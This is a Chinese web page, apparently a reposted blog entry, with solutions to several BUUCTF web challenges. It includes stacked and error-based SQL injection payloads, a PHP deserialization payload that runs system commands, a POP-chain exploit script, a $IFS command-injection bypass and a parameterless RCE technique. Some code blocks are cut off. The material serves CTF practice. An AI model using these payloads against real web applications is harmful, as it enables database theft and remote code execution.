最新要闻

广告

手机

iphone11大小尺寸是多少?苹果iPhone11和iPhone13的区别是什么?

iphone11大小尺寸是多少?苹果iPhone11和iPhone13的区别是什么?

警方通报辅警执法直播中被撞飞:犯罪嫌疑人已投案

警方通报辅警执法直播中被撞飞:犯罪嫌疑人已投案

家电

世界百事通!Buu刷题

来源:博客园

[强网杯 2019]随便注

?inject=-1";show databases%23?inject=-1";show tables from `supersqli`%23?inject=-1";show columns from `1919810931114514`%23

得知flag在supersqli库的1919810931114514的flag列下而且select|update|delete|drop|insert|where都被过滤

解法1

?inject=-1";show tables from `supersqli`%23?inject=-1";show columns from `words`%23

把word改成其他的表,然后把1919810931114514改成word,把flag改成data,给word表?inject=-1";alter table words rename to words1;alter table `1919810931114514` rename to words;alter table words change flag id varchar(50);%23?inject=1" or 1=1%23拿到flag


(资料图片)

解法2

?inject=1";HANDLER `1919810931114514` OPEN; HANDLER `1919810931114514` READ FIRST; HANDLER `1919810931114514` CLOSE;%23

利用mysql的优化查询

[SUCTF 2019]EasySQL

输入1回显1,输入0无回显猜测语句为select id||flag from Flag使id=\*,1这样语句就变成了 select \*,1||flag from Flag得到flag

[网鼎杯 2020 朱雀组]phpweb

BurpSuite发现这个包phpinfo被拦截func=file_get_contents&p=index.php读取index.php

func != "") {                echo gettime($this->func, $this->p);            }        }    }    $func = $_REQUEST["func"];    $p = $_REQUEST["p"];    if ($func != null) {        $func = strtolower($func);        if (!in_array($func,$disable_fun)) {            echo gettime($func, $p);        }else {            die("Hacker...");        }    }    ?>

可见,直接getshell的函数都被禁用了,只能利用反序列化

O:4:"Test":2:{s:1:"p";s:22:"cat /tmp/flagoefiu4r93";s:4:"func";s:6:"system";}拿到flag

[WUSTCTF2020]朴实无华

robots.txt最终找到fl4g.php?num=1e5&md5=0e215962017&get_flag=tac$IFS$9fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag

[极客大挑战 2019]HardSQL

报错注入check.php?username=1&password=0"or(updatexml(1,concat(0x7e,(select(group_concat(password))from(H4rDsq1)),0x7e),1))%23flag{a79e3f16-a79d-4949-abe2-e6check.php?username=1&password=0"or(updatexml(1,concat(0x7e,(select(right(group_concat(password),30))from(H4rDsq1)),0x7e),1))%236-a79d-4949-abe2-e64d24a0c9bd}flag{a79e3f16-a79d-4949-abe2-e64d24a0c9bd}

[MRCTF2020]Ezpop

class Modifier {   protected  $var;   public function append($value){       include($value);   }   public function __invoke(){       $this->append($this->var);   }}class Show{   public $source;   public $str;   public function __construct($file="index.php"){       $this->source = $file;       echo "Welcome to ".$this->source."
"; } public function __toString(){ return $this->str->source; } public function __wakeup(){ if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) { echo "hacker"; $this->source = "index.php"; } }}class Test{ public $p; public function __construct(){ $this->p = array(); } public function __get($key){ $function = $this->p; return $function(); }}if(isset($_GET["pop"])){ @unserialize($_GET["pop"]);}else{ $a=new Show; highlight_file(__FILE__);}

利用链:Show::__wakeup ->Show::__toString ->Test::__get ->Modifier::__invokeexp

append($this->var);        echo 1;    }}class Show{    public $source;    public $str;    public function __toString(){        return $this->str->source;    }    public function __wakeup(){        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {            echo "hacker";            $this->source = "index.php";        }    }}class Test{    public $p;    public function __get($key){        $function = $this->p;        return $function();    }}$t=new Show();$t->source=new Show();$t->source->str=new Test();$t->source->str->p=new Modifier();echo urlencode(serialize($t));

[BJDCTF2020]The mystery of ip

XFF头的ssti

[GXYCTF2019]禁止套娃

git泄露拿到源码无参数rce参考文章

?exp=var_dump(scandir(current(localeconv())));//扫描目录下的文件?exp=var_dump(next(array_reverse(scandir(current(localeconv())))));//flag.php?exp=show_source(next(array_reverse(scandir(current(localeconv())))));//读取文件

关键词: 朴实无华 反序列化